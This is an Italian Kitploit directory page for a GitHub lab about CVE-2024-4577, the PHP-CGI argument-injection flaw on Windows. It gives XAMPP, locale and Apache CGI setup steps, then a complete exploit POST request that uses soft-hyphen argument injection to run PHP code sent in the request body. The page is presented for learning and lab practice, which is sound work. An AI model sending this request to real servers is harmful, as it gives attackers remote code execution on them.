Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577 — Crea lab per CVE-2024-4577 | Kitploit
Strumenti/GitHubGitHub/alpereny-cs/cve-2024-4577
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

Crea lab per CVE-2024-4577

Vedi Repository
212 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-4577 - Iniezione di Argomenti PHP-CGI RCE

CVEDescrizioneCVSSv3
CVE-2024-4577Vulnerabilità di Iniezione di Argomenti PHP-CGI9.8

"CVE-2024-4577 è una vulnerabilità critica di iniezione di argomenti in PHP che può essere sfruttata per ottenere esecuzione remota di codice (RCE). Secondo i ricercatori di DEVCORE, questo difetto è il risultato di errori nelle conversioni di codifica dei caratteri, che interessano la funzione 'Best Fit' su Windows." -

Scarica lo strumento

Tenable

Crea il laboratorio per CVE-2024-4577

Scarica XAMPP

Scarica XAMPP (8.1.25 / PHP 8.1.25) Dopo aver installato XAMPP, verifica la versione di PHP. Dovrebbe essere 8.1.25. La versione di PHP può essere verificata eseguendo il comando "php -v" dalla riga di comando. Se restituisce un errore, deve essere aggiunta alla variabile PATH di PHP.

Imposta le impostazioni locali (Locale)

È necessario modificare le impostazioni locali. Per farlo, segui Pannello di controllo > Orologio e area geografica > Area geografica. Imposta il formato su Giapponese, Cinese tradizionale o Cinese semplificato. Fai clic su Amministrativo > Cambia impostazioni locali del sistema e seleziona le impostazioni locali appropriate.

Configurazione di Apache

Se PHP non viene eseguito in modalità CGI, è necessario effettuare queste impostazioni.

  • Copia php.exe o php-cgi.exe nella cartella /cgi/bin/.
  • Aggiungi queste righe a \xampp\apache\conf\httpd.conf ⬇️
root@kitploit:~
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Vai a httpd-xampp.conf e trova LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Metti '#' all'inizio della riga.

Avvia Apache

Salva le modifiche e avvia l'istanza di Apache.

Sfruttamento

Se l'output del codice PHP inviato nel corpo della richiesta POST sottostante viene visualizzato nella risposta, il passo di sfruttamento è riuscito.

root@kitploit:~
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

Disclaimer⚠️

Questo ambiente di laboratorio è inteso esclusivamente a scopo educativo e non deve essere utilizzato in ambienti live. Non sono responsabile per eventuali danni o perdite che potrebbero verificarsi a causa di un uso improprio. Gli utenti devono utilizzare questo ambiente a proprio rischio.